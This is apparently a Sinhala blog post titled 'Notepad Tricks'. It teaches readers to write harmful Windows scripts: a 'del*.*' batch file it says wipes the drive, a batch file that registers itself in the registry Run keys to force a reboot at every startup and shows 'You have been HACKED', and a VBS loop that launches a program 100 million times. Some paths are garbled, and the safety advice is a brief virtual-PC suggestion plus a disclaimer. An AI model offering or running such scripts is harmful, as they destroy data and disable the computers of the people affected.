Notepad Tricks

NotePad කියන්නෙ ගොඩක් අය වැඩිය ගනන් ගන්නෙ නැති දෙයක්නෙ.. ඒ උනාට NotePad භාවිතයෙන් විවිධ හොද මෙන්ම පරිගණකයට හානිදායක් දේවලුත් කරන්න පුලුවන්. මේ පෝස්ට් එකෙන් බලාපොරොත්තු වෙන්නෙ NotePad එකෙන් කළ හැකි භයානක වැඩ කිහිපයක් ඔයාලට කියල දෙන්න...
මේ දේවල් ඇත්තටම ටිකක් භයානක වන නිසා Virtual PC එකක් භාවිතයෙන් අත් හදා බැලීම වඩාත් සුදුසු වේවි...
ඔබේ පරිගණක පද්ධතියම Delete කරන්න. HDD එකේ සියලුම File සුද්ද කරල දේවි.
del*.*
මෙය ඔබ කැමති නමක් ලබාදී අගට .bat ලෙස සටහන් කර save කරන්න.
පරිගණකය ON කරපු ගමන් OFF කරවන්න.
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun/v
startAPI/t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun/v/t
reg_sz /d c:windowshartlell.bat/f
echo You have been HACKED.
PAUSE
2.bat ලෙස save කරන්න.
පරිගණකය ඉවරයක් කරන්න.
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next
මෙය Anything.VBS ලෙස save කරන්න.
මෙහි සදහන් කරන ලද Notepad Tricks භාවිතය බොහෝ විට පරිගණකයට යම් අයුරකින් හානිදායක් වියහැකි බැවින් මෙවා අත් හදා බැලීමට යාමේදී සිදුවන ගැටලුවලට අප වගකියනු නොලැබේ...
එහෙනම් යාලුවනේ අදට මෙපමණයි. ප්‍රයෝජනවත් උනානම් Share පාරක් දාන්න අමතක කරන්න එපා.
Comments
Post a Comment